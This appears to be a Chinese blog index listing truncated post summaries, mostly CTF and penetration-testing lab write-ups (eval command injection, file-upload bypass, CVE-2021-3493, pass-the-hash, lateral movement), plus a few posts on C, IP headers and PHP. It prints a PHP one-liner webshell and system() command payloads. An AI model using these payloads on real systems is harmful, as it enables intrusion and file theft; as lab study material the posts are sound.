mushangqiujin

摘要： 1.eval执行 payload: 查看文件 cmd=system('ls'); 读取flag cmd=system('cat /flag_12119'); 2.文件包含 shell.txt payload: file=shell.txt&ctfhub=system(%27ls%20/%27); f 阅读全文

摘要： 环境： ubuntu 16.04 cve-2021-3493支持的版本： - Ubuntu 20.10 - Ubuntu 20.04 LTS - Ubuntu 19.04 - Ubuntu 18.04 LTS - Ubuntu 16.04 LTS - Ubuntu 14.04 ESM 上传exp，编 阅读全文

摘要： 1.无验证 直接上传一句话木马 <?php @eval($_POST[1])?> 在使用蚁剑连接，查看flag 2.前端js 直接删除j验证的js代码即可 或禁用js 3.MIME检查 burp抓包修改mime 蚁剑连接 4…htaccess 上传.htaccess 把jpg后缀的文件当php代码处 阅读全文

摘要： 1.使用nmap进行信息搜集，存活主机，端口 192.168.85.184是存活主机，发现开放22，80端口 2.访问192.168.85.184的80端口 发现被重定向了，修改hosts文件 vim /etc/hosts 添加一行 192.168.85.174 wordy 3.对网站进行信息搜集并 阅读全文

摘要： 0x00前言 pass the hash（哈希传递攻击，简称pth） pass the ticket（票据传递攻击，简称ptt） pass the key（密钥传递攻击，简称ptk） PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试（NTLM认证攻击） PTK(pass 阅读全文

摘要： 0x00 内网横向移动介绍 内网横向移动是什么 在内网渗透中，当攻击者获取到内网某台机器的控制权后，会以被攻陷的主机为跳板，通过收集域内凭证等各种方法，访问域内其他机器，进一步扩大资产范围。通过此类手段，攻击者最终可能获得域控制器的访问权限，甚至完全控制基于Windows操作系统的整个内网环境，控制 阅读全文

摘要： 0x00环境搭建 两种形式 1.添加vmare2网卡，修改vmare2网卡的地址为192.168.93.0网段，注意不要在连接到主机适配器上打勾，这样会使本机也可以访问此电脑，5台机器都换成vmare2即可，第一台出网的centos在添加另一张nat网卡即可 centos需要改配置 nginx配置 阅读全文

摘要： char类型数组 字符串，由一个或多个字符组成的序列就做字符串。双引号不是字符串的一部分，只是告诉双引号里的内容是字符串，C语言中没有专门储存字符串的变量类型，字符串都被存储在char类型的数组中。数组由连续的储存单元组成，可以把数组看作是一行连续的多个存在的存储单元，数组是同类型数据元素的有序序列 阅读全文

摘要： ip协议关键报文: 版本号(version) 首部长度(ihl) ip数据包头部的长度，常用长度20bytes 服务类型(tbs) 总长度(len) ip数据包的总长度 标识(id) 数据包编号 标志(flag) MF=1 表示后面的还有分片，MF=0 这是数据包的最后一个，DF=1 不能分片 DF 阅读全文

摘要： php面向对象三大特性：多态性，封装性，继承性 多态性： 多态性是指面向不同的对象时，表现出不同的反映，比如对自己喜欢的人和不喜欢的人的态度，反映 <?php /** * Created by PhpStorm. * User: SK * Date: 2022/11/24 * Time: 17:10 阅读全文